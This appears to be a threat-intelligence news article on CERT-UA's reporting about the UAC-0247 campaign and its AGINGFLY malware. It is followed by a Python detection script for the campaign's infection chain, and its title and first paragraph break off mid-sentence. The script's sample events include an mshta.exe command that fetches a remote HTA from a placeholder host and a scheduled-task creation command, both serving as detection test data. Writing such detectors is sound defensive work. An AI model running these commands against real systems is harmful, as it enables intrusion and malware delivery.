New UAC-0247 Campaign Steals Browser and WhatsApp Data From

Jennifer Sherman
April 16, 2026

A threat cluster identified as UAC-0247 has been actively campaigning since early 2026. This operation, detailed in a

The attackers are not only stealing sensitive data from internet browsers and WhatsApp but are also moving quietly through compromised networks to expand their reach.

The campaign begins with a simple but deceptive email. The attacker reaches out to the target under the cover of a humanitarian aid discussion, asking the recipient to click on a link.

To make the email look convincing, the attacker either builds a fake website using artificial intelligence tools or redirects the victim to a legitimate third-party site that carries a Cross-Site Scripting (XSS) vulnerability. Once the victim clicks the link, an archive file downloads to their computer.

Opening the archive triggers a shortcut (LNK) file that launches the standard HTA file processing tool, mshta.exe, which then pulls and runs a remote HTA file. That HTA displays a decoy form to keep the victim distracted while a background process drops and launches an executable file through a scheduled task.

CERT-UA analysts identified and documented this activity as part of an intensified wave of cyberattacks recorded during March and April 2026, noting that the same cluster has also targeted representatives of Ukraine’s Defense Forces and FPV drone operators.

In one confirmed case from March 10, 2026, an archive named “bachu.zip” was distributed through the Signal messenger, posing as an updated version of the “BACHU” software tool used by FPV operators.

Inside, the archive carried a DLL file that launched the AGINGFLY malware through a DLL side-loading technique the moment the main executable ran.

Across the dozen or so incidents studied, the tools deployed in this campaign reveal a consistent pattern of data theft and network reconnaissance.

Attackers used CHROMELEVATOR to pull authentication data and other stored credentials from internet browsers, while a separate tool called ZAPIXDESK was used specifically to steal data from the WhatsApp messenger application.

Alongside the theft tools, the attackers used basic subnet scanners and the publicly available RUSTSCAN tool to map out internal networks.

In some cases, the LIGOLO-NG and CHISEL tools were deployed to build hidden network tunnels, and one incident even revealed the use of the XMRIG miner, packaged as a DLL and loaded through a patched version of the legitimate WIREGUARD program.

Inside the AGINGFLY Malware

The core remote access tool used across this campaign is AGINGFLY, written in the C# programming language. It provides the attacker with a full set of remote control capabilities, including command execution, file downloading, screenshot capture, keylogger activation, and in-memory code execution.

What makes AGINGFLY stand out from similar tools is that its command handlers are not built into the malware itself.

Instead, they are downloaded from the command-and-control (C2) server as source code and compiled on the fly inside the infected system.

Communication with the C2 server runs over WebSockets, and all traffic is encrypted with AES-CBC using a static key.

To maintain a persistent foothold, the campaign also uses a PowerShell script named SILENTLOOP, which automatically runs commands, updates its configuration, and retrieves the latest C2 server IP address from a Telegram channel.

If the primary Telegram source fails, SILENTLOOP also supports backup mechanisms to find the C2 address.

The initial access stage uses either a TCP reverse shell or RAVENSHELL, which establishes an encrypted TCP connection using a 9-byte XOR key and communicates with the management server through CMD.

CERT-UA recommends that organizations reduce their exposure by restricting the execution of LNK, HTA, and JS files on endpoint systems. Administrators should also limit the use of legitimate utilities such as mshta.exe, powershell.exe, and wscript.exe, which this campaign actively abuses.

These restrictions align with standard attack surface reduction practices built into the operating system and do not require third-party tools to implement.
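The infection chain described above (LNK to mshta.exe to a remote HTA to a scheduled task) and the utilities CERT-UA recommends restricting can be turned into a simple process-tree check. The following is an added example, not code from the report or from CERT-UA: it runs two detection rules over constructed process-creation events shaped like Sysmon Event ID 1 records (the hostnames, paths and task names are made up).

```python
import re

# Constructed sample events (not real telemetry): pid, parent pid, image, command line.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # explorer.exe runs the LNK, which launches mshta.exe against a remote HTA
    {"pid": 2001, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/form.hta"},
    # the HTA creates a scheduled task that launches the dropped executable
    {"pid": 2002, "ppid": 2001, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /Create /SC MINUTE /TN Update /TR C:\\Users\\Public\\svc.exe"},
    # benign: a local HTA shipped with an installed product
    {"pid": 3001, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\help.hta"},
    {"pid": 4001, "ppid": 1000, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Rule 1: mshta.exe given an http(s) URL, i.e. pulling a remote HTA.
REMOTE_HTA = re.compile(r"mshta(\.exe)?\s+\"?https?://", re.IGNORECASE)
# Rule 2: schtasks /Create with one of the abused script hosts in its ancestry.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Yield the image names of parent, grandparent, ... for a given pid."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            yield basename(by_pid[pid]["image"])


def find_alerts(events):
    """Return (pid, reason) tuples for events matching either rule."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        if name == "mshta.exe" and REMOTE_HTA.search(e["cmdline"]):
            alerts.append((e["pid"], "mshta.exe fetching a remote HTA"))
        if name == "schtasks.exe" and "/create" in e["cmdline"].lower():
            if any(a in SCRIPT_HOSTS for a in ancestors(by_pid, e["pid"])):
                alerts.append((e["pid"], "scheduled task created under a script host"))
    return alerts
```

The local-HTA launch (pid 3001) is deliberately not flagged, so the rules stay usable where vendor HTAs are legitimate; tighten rule 1 to any mshta.exe launch if the endpoint policy blocks HTA entirely.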
